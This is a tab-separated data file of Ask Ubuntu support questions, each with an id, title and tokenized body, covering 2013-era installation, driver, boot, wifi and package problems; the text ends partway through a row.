294940	resolving mariadb removal issue	my mysql/mariadb installation got corrupted , and i 'm trying to remove and reinstall via apt-get unfortunately , i 'm having a major issue with apt-get freezing after stopping the mariadb server . this is the output i 'm getting jason @ asus : ~ $ sudo apt-get install mariadb-server-core-10.0 reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : mariadb-server-10.0 use 'apt-get autoremove ' to remove them . the following new packages will be installed : mariadb-server-core-10.0 0 upgraded , 1 newly installed , 0 to remove and 25 not upgraded . 2 not fully installed or removed . need to get 0 b/5,486 kb of archives . after this operation , 15.3 mb of additional disk space will be used . selecting previously unselected package mariadb-server-core-10.0 . ( reading database ... 361764 files and directories currently installed . ) unpacking mariadb-server-core-10.0 ( from ... /mariadb-server-core-10.0_10.0.2+maria-1~precise_i386.deb ) ... setting up mariadb-server-core-10.0 ( 10.0.2+maria-1~precise ) ... setting up mariadb-server-10.0 ( 10.0.2+maria-1~precise ) ... * stopping mariadb database server mysqld after that last line , apt-get freezes with no progress over 10 minutes .
294941	i ca n't update my spotify on 13.04 , what should i do ?	please let me know what details i should provide for troubleshooting .
294942	ubuntu 13.04 desktop	installed ubuntu 13.04 desktop from usb boot flash i get a blank screen with 2 small icons at the bottom of the screen , then the rest starts to load , then after a while i get just a corrupted screen , so i cant get any further and have to switch computer off i have tried new download still the same result . anyone help they say its as easy as 1 2 3 to use a usb install , i can get 1 then 2 but 3 ? ? thanks pete
294946	how to change root password in ubuntu ?	i am trying to change root password in my ubuntu system . this is what i did : ashot @ ashot-desktop : ~ $ sudo passwd root passwd : authentication token manipulation error passwd : password unchanged how do i change root password in ubuntu ?
294947	what are the security support statuses of derivatives ?	i have only a quick question . does kubuntu , xubuntu and others has the same level of security like the plain ubuntu ? i mean security for the desktop environment , because i know that for others it has , because it is based on ubuntu . and also , do i need to worry about it , as i am not an advanced user ? ( not beginner , but i 'm not extremely good at it as others : d ) thank you for your answer !
294951	log into root directly	quite a while back i 'd worked briefly on red hat , and it had this option of booting into root directly , and not using the su command to change your access . i know that by default the root account is disabled in ubuntu and for all practical purposes is as good as non existent , but still suppose it is unlocked , can we log into root directly ? ideas ?
294953	gtk-key-theme emacs : what keystroke is for select-all ?	i prefer emacs keystrokes , but select-all does n't seem to be part of the emacs vocabulary , or at least , the gtk-key-theme for emacs . m-w is n't working to copy the selected region . what 's the keystroke for select-all ? where is a key binding map for this theme ? thanks , steve
294955	adobe master collection	love ubuntu operating system , however i 'm a designer and i work with adobe products . i wonder if there is something that allows me to install adobe products in ubuntu .
294957	libreoffice writer styles	is there anyway to easyly manage styles on libreoffice writer ? for instance , by installing a add-on ? when i was using word , it was really intuitive to use differents styles , manage them and edit them . when i want to make a nice page layout , i use the style function with f11 , but it is not really instinctive .
294960	is there download manager like idm for automatically fetching link address of streaming video ?	is there any download manager that can be freely integrated to chromium or firefox , so that it will fetch the remote link url of any audio , video during streaming . i have used steadyflow download manager and recently installed flareget , but still getting trouble for downloading streaming videos . is there any better way.. ? thanks in advance ...
294963	how to get nvidia graphic card to work on thinkpad t430 ?	i installed ubuntu linux on my thinkpad t430 and everything works until last week . because then i bought a new monitor with a higher screen resolution than full hd . so i can not run the monitor with a higher resolution than 1920*1080 . the t430 is running with two graphic cards : intel hd 4000 nvidia quadro nvs 5400m the notebook also allows running in `` optimus '' mode . i want to use the thinkpad t430 and two monitors : one with full hd resolution on the vga port and one with 2550x1400 resolution on the mini display port i tried these approaches : optimus mode = enabled in bios i enabled the optimus mode ( without bumblebee ) and in ubuntu 13.04 everything works , even both monitors get detected . but the problem is , the monitor connected to the mini display port ( 2550x1400 ) does n't render the mouse courser correctly . it is laggy , so all mouse positions of the courser of the last 5 seconds are shown . in this setup no extra software is installed , only the drivers delivered by ubuntu . this works so far the best . only the mouse courser problem sucks . but i do n't know what to do about that . any suggestions ? optimus mode = disabled , run only on nvidia graphic card i installed ubuntu 13.04 with only the nvidia graphic card enabled . works fine . but i can only run one monitor ( which would be okay ) , but the max resolution was 1920*1080 , even on the monitor with a higher default resolution . any suggestions to fix that ? optimus mode=disabled/enabled , use nvidia drivers i also tried installing the nvidia drivers via 'sudo apt-get install nvidia-current ' but that did not work . after that the system does not boot anymore . only a black screen is shown after boot loader . the system only boots if i enable optimus mode . i assume that the intel graphic card is used in that case . *bumblebee i tried installing bumblebee with optimus mode=enabled . i got it installed , but it did not get the monitor on the mini display port detected . so it did n't work as i assumed it would . i am not a linux expert and i am really stuck with this problem . do you guys have any ideas or suggestions how i can get either the nvidia graphic card or the optimus mode running ? i do n't care if the battery is running out of energy very fast . if you need anything else , please let me know . thanks for your help . kind regards q
294964	install ubuntu touch for tablet nexus 7	after phablet-flash -b command and get raring-preinstalled-phablet-armhf.zip file at last appear this : validating download for raring-preinstalled-phablet-armhf.zip error while downloading , ensure connection please help me , thanks !
294965	samsung driver does n't detect sane correctly	from 13.04 ( server ) i 'm trying to install the samsung unified printer driver as specified by https : //wiki.ubuntu.com/hardwaresupportcomponentsprinterssamsung which has a dead link . in any event , the driver is on the samsung webpage . see : http : //askubuntu.com/a/170895/45156 however , i keep getting an error that sane is missing when i execute the install.sh script for the samsung driver . however , i seem to have sane : thufir @ dur : ~/downloads/cdroot/linux $ thufir @ dur : ~/downloads/cdroot/linux $ ll total 136 drwxrwxrwx 5 thufir thufir 4096 may 13 11:54 ./ drwxrwxrwx 3 thufir thufir 4096 may 13 11:54 ../ -r-xr-xr-x 1 thufir thufir 3825 sep 26 2008 check_installation.sh* drwxrwxrwx 8 thufir thufir 4096 may 13 11:54 i386/ -r-xr-xr-x 1 thufir thufir 3451 sep 26 2008 installer.htm* -r-xr-xr-x 1 thufir thufir 52321 sep 26 2008 install.sh* drwxrwxrwx 5 thufir thufir 4096 may 13 11:54 noarch/ -r-xr-xr-x 1 thufir thufir 204 sep 17 2007 oem.ini* -r-xr-xr-x 1 thufir thufir 52321 sep 26 2008 uninstall.sh* drwxrwxrwx 8 thufir thufir 4096 may 13 11:54 x86_64/ thufir @ dur : ~/downloads/cdroot/linux $ thufir @ dur : ~/downloads/cdroot/linux $ sudo apt-get install libsane-extras-common libsane-extras libsane libsane-common sane xsane reading package lists ... done building dependency tree reading state information ... done libsane is already the newest version . libsane-common is already the newest version . libsane-extras is already the newest version . libsane-extras-common is already the newest version . sane is already the newest version . xsane is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . thufir @ dur : ~/downloads/cdroot/linux $ there 's no way to get this working through apt ? for 12.04 , i do n't recall doing this . it just worked . however , i 'm now running a `` server '' version ( smaller download for a clean install ) so i 'm thinking that it 's missing packages , and that there 's a meta package to pull all this in . i do n't recall downloading from samsung before . in fact , this printer , and that it was `` auto-magically '' detected by ubuntu , back in 11.x , was a factor in choosing ubuntu . here 's a screenshot from another attempt :
294967	8086 emulator . issue with i8086 istallation	i am an emu8086 user , and i find it very good , but it exists only in windows . are there any good ubuntu 8086 emulator ? i need it to practice 16bit assembly code . i care about seeing what happens on the registers , at every instruction execution . i 'm running ubuntu 13.04
294969	audio switches between headphone and output	on my xubuntu 13.04 installation , when the sound is turned up to high levels ( > 50 % ) , it begins to ( randomly ? ) fluctuate between loud and quiet . in pavucontrol , the port setting is fluctuating between `` analogue output '' and `` headphones '' ( i 'm using desktop speakers plugged into the integrated audio line out ) . any ideas ?
294970	changes to the kde library prevent compiz 0.9.7.12 from compiling	i have been been following a tutorial on modifying existing compiz plugins , but run into the following error when compiling compiz-0.9.7.12 : in file included from /home/sre/rbrais/compiz-core-0.9.7.12/build/kde/window-decorator-kde4/moc_window.cpp:10:0 , from /home/sre/rbrais/compiz-core-0.9.7.12/build/kde/window-decorator-kde4/kde4-window-decorator_automoc.cpp:4 : /home/sre/rbrais/compiz-core-0.9.7.12/build/kde/window-decorator-kde4/../../../kde/window-decorator-kde4/window.h:27:31 : fatal error : kdecorationbridge.h : no such file or directory compilation terminated . make [ 2 ] : *** [ kde/window-decorator-kde4/cmakefiles/kde4-window-decorator.dir/kde4-window-decorator_automoc.o ] error 1 make [ 1 ] : *** [ kde/window-decorator-kde4/cmakefiles/kde4-window-decorator.dir/all ] error 2 make : *** [ all ] error 2 according to the error , the program is missing the file 'kdecorationbridge.h ' . this file should be contained in the kde-workspace package according to the kde api . the access settings of the file 'kdecorationbridge.h ' has been changed from `` public ' to 'private ' according to kde review board . does this change in access settings prevent me from building compiz 0.9.7.12 ? another user has run into the same problem on another discussion board . however , i could use some help understanding their solution . do i merely install the kde-base pacakge , or must i modify the source code of the build file to access the kde-base package ? i am considering installing another version of compiz , but have not been able to determine the most stable version . if i can first install compiz , i will move on to modifying existing plug ins and develop my own . my end goal is to update a plug in developed for an earlier release of compiz to the latest release . any answers to my compilation query , or links to resources on learning how to develop compiz tutorials would be greatly appreciated . thank you !
294972	remote play movies/music	i have a basic understanding of using ssh , as in that it allows you to access files on a remote server from a local client , to run on the remote server . however , what i am trying to achieve is a way to access the files on the server , to run on the client . i have an external hd connected to my server machine that is full of movies and music and it simply is n't practical to physically have the hd when i am out and about . how could i access/play these files on the client ? is there a way to do this without using a service such as ubuntuone ( due to limited storage ) ?
294974	optifine not working	i have minecraft 1.5.2 and java 6 and i realized that i could not install or use optifine . can anyone help ?
294978	can i use the indicator icons from ubuntu touch on the desktop version ?	i am re-theming my ubuntu 13.04 laptop to use an interface which looks more like that of ubuntu touch . one of the last things i need to complete the look are the indicator icons being used in ubuntu touch 's top panel . is there a way i can get these icons and use them instead in ubuntu 13.04 ?
294981	how to trace all the file transfered into my ubuntu server	i just started a task and i 'm trying to get a list of the all file transfer that is happening on my server , from outside the server , mean user sending file through ftp or scp just , this task is just for a periodically health check , i read here that the scp file transfer log file i the same as ssh , i tried to serch inside this file /var/log/auth.log using grep -i `` scp '' /var/log/auth.log but i found nothing . the return was empty . does anyone have any idea how that should happened or should i turn some feature on to log that information for future file transfer ? thanks !
294993	grub wont load . cant boot either os	i 'll start by saying i 'm not the very tech savvy , so i 'll really need help with this ! problem : i can not load either my ubuntu os or my windows 8. when i start my computer , a few lines run saying `` failed to load grub '' along with other things i couldnt really identify . let me explain further : yesterday i had installed ubuntu 13.04 on my hp laptop to run alongside windows 8 the initial install went smooth but i encountered a problem : when i started up my computer , it would only load windows 8 . after looking around i saw i needed to run something called boot-repair within a liveusb/dvd of the ubuntu installer . after running this program i was told i could restart my computer . after doing so , my problem appeared . now all i can do with my computer is use the live usb i created . theres alot more to it , but thats the basic what happened . i 'd very much appreciate help , i 'm kind of scared ! also , the boot-repair gave me a link , im guessing its the results of the repair ? idk , i 'll put it here http : //paste.ubuntu.com/5662277/
294994	why does the amd proprietary graphics driver not support old cards ?	i 've got a rather old notebook with an amd ati 3200 graphics card inside . now i use xubuntu 13.04 on it and found out that there is no support for this chipset anymore , due to some x.org conflicts . but before that i used manjaro ( user-friendly arch derivate ) , where my graphics card got automatically dedected and the proprietary driver was used , i even got the catalyst control center . right now i am trying to create the package myself with the download from the amd website but i do n't think that will work . has anybody got an idea why i ca n't use the driver on ubuntu , what i can do to use it and if it 's a bad idea to create the package myself with the newest package from the website ? edit : ok , got a solution now : simply use this repo , which downgrades your x-server to 1.12.4 , which enables you to install the proprietary drivers . according to the launchpad site , do this : sudo add-apt-repository ppa : makson96/fglrx sudo apt-get update sudo apt-get upgrade sudo apt-get install fglrx-legacy
294998	power off the monitor on install ubuntu 13.04	when i try to install ubuntu 13.04 , i have problem to display . in first i see the page same as blank after about 5 sec monitor power off and get to standby mode but the dvd-rom is worked hard and system too . my monitor is lg flatron e1940 and my graphic cart is on-board and my main-board is asus m3n-ht deluxe . what is the problem ? how i can fix it and install ubuntu 13.04 on my system ? ( because i ca n't install this without display )
295000	undefined reference to dlopen and friends	i am attempting to compile scheme48 , and get undefined references to dlopen and friends . system : xubuntu 12.10 , 32bit build-essentials and libc6-dev are installed . in /lib/i386-linux-gnu/ the file libdl.2.15.so exists . libdl.so.2 is a symlink to it . /usr/lib/i386-linux-gnu/libdl.so is a symlink to /lib/i386-linux-gnu/libdl.so.2 the makefile has -ldl on the gcc command to link up the executable . i 'm clearly missing some magic sauce here as all google digs up complains about 64bit failing while 32bit works . but 32bit does not build . what gives ?
295002	what happened to no indexing certain directories ?	ubuntu 13.04 no longer has an option to keep certain folders from being indexed . why was this removed and how do you reinstate it ?
295005	i am running unbuntu 12.10 on a ibm lenovo thinkpad r51 ( non pae cpu ) how do i install 13.04 from live dvd	i am running ubuntu 12.10 on a ibm lenovo thinkpad r51 . it has a non pae cpu . i purchased a 13.04 live dvd . the live dvd will not boot . is it possible to work around this without jumping through a lot of hoops ?
295006	acer aspire one d270 screen crash at wake up	yesterday i installed installed ubuntu 12.04 on my acer aspire one d270-1838 . everything worked ok , except i could n't adjust brightness , i fixed it changing : grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' in grub . the problem is when i closed the lid it suspended properly but trying to start it again it showed a crashed screen . i have read people with a similar problem but they report screen completely black , mine is n't . i wanted to upload an image of the screen but i do n't have the reputation ... . something i can do to suspend my netboot and that works fine is type : sudo pm-suspend -- quirk-dpms-on and it suspends correctly but without authentication , that 's not a problem for me but it is tedious . also , i can enter a virtual terminal with alt+ctrl+f1 which works fine and kill x , this fixes the screen crash but also terminates my session . however there are sometimes that after the first try if i try to close the lid and open it up again , the screen stays on but black and i cant enter the virtual terminal . i 'm not tech saavy , but i hope you can direct me to a way of fixing this problem .
295007	view total disk space taken by all installed packages	is there a way to view a 'system size ' ? i want to know how large i should make partitions if i separate my /home from the / ( root ) partition , but i do n't know how much space ubuntu + every installed application takes up . essentially , the answer would be the total disk space taken if all home directories and user files were deleted . i 've seen commands like these that show the size of different packages , but never one that creates a total . perhaps one of these terminal commands could be modified to do such a thing ? http : //www.commandlinefu.com/commands/view/3842/list-your-largest-installed-packages-on-debianubuntu
295009	hard drive that boots ubuntu	is it possible to boot ubuntu from an external hard drive so that i can carry around a hard drive and plug it into any computer and be able to boot up ubuntu ?
295011	does ubuntu 13.04 conclusively support trim ?	i 'm getting ready to install ( dual boot ) ubuntu , but i have heard conflicting information on how well supported trim is . i 'm solely using an intel 330 and would not install it if i do n't know whether it 's going to be doing tons of write cycles . helpful links would be appreciated . thanks
295013	why does compiling the linux kernel cause ubuntu to freeze ?	i need help figuring out how compiling the linux kernel causes ubuntu to freeze . i 'm trying to cross-compile the linux kernel for the zedboard . it is a zynq-7000 arm architecture . when i compile , it gets down to a journal.o file and the entire system freezes and i have to restart . xilinx/zedboard has no idea , so maybe somebody else does . let me know what other information you need .
295015	no /dev/sd for my hard drive ?	i recently tried to install lubuntu on an external hard drive and it had an error ( just my luck ) . i thought everything was fine , so i went to gparted to reset the partitions for use with windows . it showed 3 devices even though all there physically is was 1 device . so i rebooted and now it would n't show up what so ever ( this is a 1tb drive so i was kinda mad ) . it was n't recognized in windows so i googled around for a solution , and came to the ubuntu rescue remix . i read that i should do the command sudo lshw -c disk -short and this gave me a table and to my surprise there is no /dev/sda or whatever letter -- it 's blank . it does read that the drive is there and it has a `` h/w path '' ( whatever that is ) ; this path is `` /0/a/0.0.0 '' . long story short , my drive is useless in now -- i 'm a bit of a noob and do n't know what to do from here . is there a way to get my drive back in a usable state ? if this helps any ( sudo lshw ) : *-disk unclaimed description : scsi disk product : my passport 0730 vendor : wd physical id : 0.0.0 bus info : scsi @ 3:0.0.0 version : 1015 serial : wx51a41x4251 configuration : ansiversion=6
295018	how can i get back to a login screen after a freeze ?	i have to manually shut down and to enter my sda crypt pass and my user pass over again . how do i force the poweroff without having to hit the power button , or get back to a login screen . nobody has answered this for multiple people . ctrl+alt+f1 does nothing , my console is gone . how can i get back to the login screen when ubuntu 13.04 freezes .
295019	how to make home pc into ubuntu server	i would like to make one of my home pc into a ubuntu server and want to access the server from my laptop . i 'm having ubuntu 13.04 in my laptop and i 'm ready to install ubuntu server in my home pc . my pc is installed with 2.6ghz dual core processor , 2gb ram and 250gb hard disk so i think this is well enough to create a server . since i 'm new to linux environment please give some clear explantion .
295020	how can i `` move '' grub ?	i had the following setup on my hard disk + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | windows ( 100 gb ) | precise ( 20 gb ) | documents ( ~ 360 gb ) | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ now i want to move to lvm . i have deleted windows and created a small partition to hold /boot . + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | boot ( 512mb ) | lvm ( 99gb ) | precise ( 20gb ) | documents ( ~ 360gb ) | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ but as i am migrating the installed ubuntu installation ( no fresh install ) , i am wondering how can i move grub there . i have already copied everything from /boot to that partition . as grub is installed on mbr , there is some step needed so grub will use that new partition ( and the menu/kernels there ) ? also how grub finds the menu ( ie how he knows that the os entries are in ( precise partition ) /boot/grub/grub.cfg ) ?
295021	disable password length/complexity in raring	i just made a vm of 13.04 . in the installer i could make a short password for the initial account ( being chided appropriately ) . now i want another test account but the passwd utility prevents me from doing short/simple passwords . i have tried sudo passwd test1 to set a simple password without success . i have also tried changing the line in /etc/pam.d/common-password to : '' password [ success=1 default=ignroe ] pam_unix.so sha512 '' but it still appears to be doing the obscure or similar test . i appreciate having these sort of checks in general , but not when they lack any sort of workaround ( even for root ) .
295027	lenovo t431s and and wireless do n't play nicely	i just unboxed a lenovo t431s and installed ubuntu 12.04.2 . everything went smoothly , but the wireless never came up . i 'm pulling a a dhcp properly with nm on my wired connection , but ifconfig does n't even show wlan0 at all . i poked around the web a bit and eventually downloaded the linux firmware from the intel website , but checking the md5sum with the file already in /lib/firmware they match . i 'm happy to post the output of other commands if they 'll help , but lspci and lshw are below . jth @ t431s : ~ $ sudo lspci -nnkv | grep -a 10 centrino 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088f ] ( rev 24 ) subsystem : intel corporation device [ 8086:5260 ] flags : bus master , fast devsel , latency 0 , irq 10 memory at f0c00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 08-d4-0c-ff-ff-00-03-ed jth @ t431s : ~ $ sudo lshw -c network *-network description : ethernet interface product : 82579lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : 3c:97:0e:92 : d6 : a1 size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.0.0-k duplex=full firmware=0.13-3 ip=166.100.1.128 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:42 memory : f1500000-f151ffff memory : f153b000-f153bfff ioport:4080 ( size=32 ) *-network unclaimed description : network controller product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 24 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0c00000-f0c01fff as per the first comment , the output of said commands ( modprobe has no output ) : jth @ t431s : ~ $ sudo modprobe iwlwifi jth @ t431s : ~ $ dmesg | grep iwl [ 2.713720 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 2.713723 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation jth @ t431s : ~ $ rfkill list all 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no jth @ t431s : ~ $ jth @ t431s : ~ $ modinfo iwlwifi | grep 088f alias : pci : v00008086d0000088fsv*sd00004260bc*sc*i* jth @ t431s : ~ $ full output of requested commands can be found here the commands run were : jth @ t431s : ~ $ dmesg > justin.txt jth @ t431s : ~ $ lsmod > > justin.txt jth @ t431s : ~ $ cat /var/log/syslog | grep iwl > > justin.txt
295032	search results in gnome shell 3.8	i have two users on my ubuntu 13.04 . both use gnome shell 3.8 from the ppa . the problem i have is that with one of my user , the search tool in gnome shell does not work well . for example , searching for `` libre '' wo n't return me any of the libreoffice software suite . with the other user , it works well . i tried to re install libreoffice , no changes . i also tried to reset gnome shell according to how do i reset gnome to the defaults ? also resulting in no changes . any idea ?
295035	wifi keeps disconnecting and extremely slow at low signal - ubuntu 13.04	first off , i just want to say that i work as an it engineer ( windows desktop/server etc ) so i am willing to go right down to the ground when it comes to advance technical troubleshooting . unfortunately however i am new to linux so please be gentle at the same time . the issue : ever since upgrading my hp pavilion g6 laptop from ubuntu 12.10 to 13.04 my wireless is not functioning correctly . the main issue is that if i sit upstairs the wireless signal drops to around '2 ' bars and the download speeds ( according to speedtest.net ) are extremely slow ( 0.26mbps ) . however if i go and sit down stairs right in front of my router i get full signal and speedtest.net shows a fast connection ( around 40mbps ) . this does not happen on ubuntu 12.10 . sat both upstairs and downstairs i can get a strong signal and speed test results of up to 40mbps . i can provide screenshots of results if evidence is required . naturally , this issue is causing my second problem . periodically at random times the connection to the wifi will request for the wifi password ( clearly the password is correct as all other devices connect fine and it was just working on this password ) . if i try clicking ok to accept the password entered it will retry to connect for a few moments before requesting the password once again . this will end up in a continuous loop until i restart the laptop . what i have tried/researched : so from numerous google searches , askubuntu questions , guides for troubleshooting wifi , knowledge bases for hardware type etc . etc . it would seem that the issue is relating to the updated version of the wireless driver built in to the open source drivers when ubuntu is deployed . to the point : running the following commands on both 12.10 and 13.04 shows the following results : ubuntu 12.10 root @ chris-test : ~ # lshw -c network *-network description : wireless interface product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 00 serial : 68:94:23:0d:0e : db width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.5.0-22-generic firmware=0.34 ip=192.168.15.225 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory:52500000-5250ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 28:92:4a:56:90:7e size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:3000 ( size=256 ) memory:52404000-52404fff memory:52400000-52403fff root @ chris-test : ~ # lspci -nnk | grep -ia2 net 01:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:539b ] subsystem : hewlett-packard company device [ 103c:18ed ] kernel driver in use : rt2800pci -- 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:183f ] kernel driver in use : r8169 ubuntu 13.04 root @ chris-laptop : ~ # lshw -c network *-network description : wireless interface product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 00 serial : 68:94:23:0d:0e : db width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.8.0-19-generic firmware=0.34 ip=192.168.15.225 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory:52500000-5250ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 28:92:4a:56:90:7e size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:3000 ( size=256 ) memory:52404000-52404fff memory:52400000-52403fff root @ chris-laptop : ~ # lspci -nnk | grep -ia2 net 01:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:539b ] subsystem : hewlett-packard company device [ 103c:18ed ] kernel driver in use : rt2800pci 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:183f ] kernel driver in use : r8169 so from what i can see , the only main difference here is the 'driverversion ' on both distros . ubuntu 12.10 : configuration : broadcast=yes driver=rt2800pci driverversion=3.5.0-22-generic firmware=0.34 ip=192.168.15.225 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn driverversion=3.5.0.22-generic ubuntu 13.04 : configuration : broadcast=yes driver=rt2800pci driverversion=3.8.0-19-generic firmware=0.34 ip=192.168.15.225 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn drivervesrion=3.8.0.19-generic i can only imagine that something has been changed in the newer versions which is actually causing problems with my wireless card . so what i think i may need to do is push this driver to the older version ? can anyone confirm this as a possible fix ? is anyone able to tell me that i am barking up the completely wrong tree ? i hope this has been informative enough for someone to provide some help . if any further information is required , as mentioned earlier , i am more than happy to run further commands and tests to try and isolate the issue . p.s . thanks in advance for your time and consideration . update so i had a very interesting moment last night ! my dvd drive was unable to open the tray when pressing the button and would no longer read dvds . i connected the mains power to my laptop and hey presto , my dvd drive started working again . leaving the mains connected i tried running a speedtest on the wifi . ( 40mbps - roughly full capability of my line ) . however , i have tried the battery on 12.10 and there is no problem what so ever . my assumption from discovering this , i can only assume that 13.04 is not supporting my battery/power settings correctly ? the other possibility is that battery itself is faulty , but when i run a battery test from the hp uefi it does not appear to show any errors . thoughts ? update 19/09/13 so following on from this , i have tried updating the 13.04 partition kernel to 3.9 rather than 3.8 which has solved the problem for some people according to a number of bug trackers . unfortunately , this has not solved the problem for me . this makes me think it is more than likely a kernel issue with these drivers . any further thoughts ?
295037	driver install question	very new to all this . built a box to run ubuntu server 12.04 during installation it would not automatically make a internet connection . i figure the new board needed to have drivers installed ubuntu server is installed and reboots fine . the box i built has no optical drive . can i copy the drivers to a usb stick and install that way ? if so please show me how . thanks in advance , thom
295058	file transfer to smartphones from ubuntu does not work properly	modern smartphones are no longer usb based mass storage , mtp is used instead . this is not good . i want to move music and folders to my phone just normal filetransfers deleting renaming copy folders etc . in ubuntu 12.10 i can not make file transfer to my phone because mtp is not supported , gmtp does not work , airdroid works but is slow , and not user friendly . ubuntu `` sees '' my phone but i can not do anything . ubuntu 13.04 i can copy to the phone one file at the time , not a folder , not huge amounts of data . this is not good enough . airdroid or dropbox is usefull but to slow and not user friendly .
295059	`` continue button '' grayed out in `` installation type '' screen during 13.04 installation	i 'm installing ubuntu 13.04 onto my 32-bit intel core 2 duo cpu , from a live-usb . one of the screens says `` installation type '' , with the three options `` install ubuntu alongside windows vista '' or `` replace windows vista with ubuntu '' or `` something else '' . no matter which of those three options i highlight , the `` continue '' button is always grayed out and un-selectable . ( i can only select `` quit '' or `` back '' . ) ( when i highlight the second option , the word `` continue '' switches to `` install now '' on the button ... but it is still grayed out and unselectable . ) other than the fact that i can not `` continue '' , the installer offers no information about what 's going wrong . any ideas ? thanks in advance ! ! [ i am also happy to hear advice about how exactly i can file a bug report about this . ]
295060	*buntu setup for granny	i 'm trying to setup a *buntu system for grandma . her needs are a browser , a text processer ( libreoffice will be fine ) , being able to watch youtube and not being able to get into too much trouble deleting or misplacing files that she really would rather keep . is there one of the ubuntu variants that makes it easy to set this up ( edubuntu ? ) or should one stick with the stock ubuntu ( since i have only really experience with that ) and then remove all superfluous menus etc .
295062	ubuntu wo n't update from 12.10 to 13.04	to update i typed in sudo update-manager -d into terminal and i got this code back ( i had to edit the links ) : w : gpg error : h.ttp : //linux.dropbox.com precise release : the following signatures could n't be verified because the public key is not available : no_pubkey fc918b335044912e , w : gpg error : h.ttp : //extras.ubuntu.com quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 , w : gpg error : h.ttp : //ppa.launchpad.net jaunty release : the following signatures could n't be verified because the public key is not available : no_pubkey f104610cf0876ac9 , w : gpg error : h.ttp : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey b187f352479b857b , w : gpg error : h.ttp : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 86d36dfde6a250ea , w : gpg error : h.ttp : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 5a9a06aef9cb8db0 , w : gpg error : h.ttp : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey c2518248eea14886 , w : gpg error : h.ttp : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey c2518248eea14886 , w : failed to fetch h.ttp : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch h.ttp : 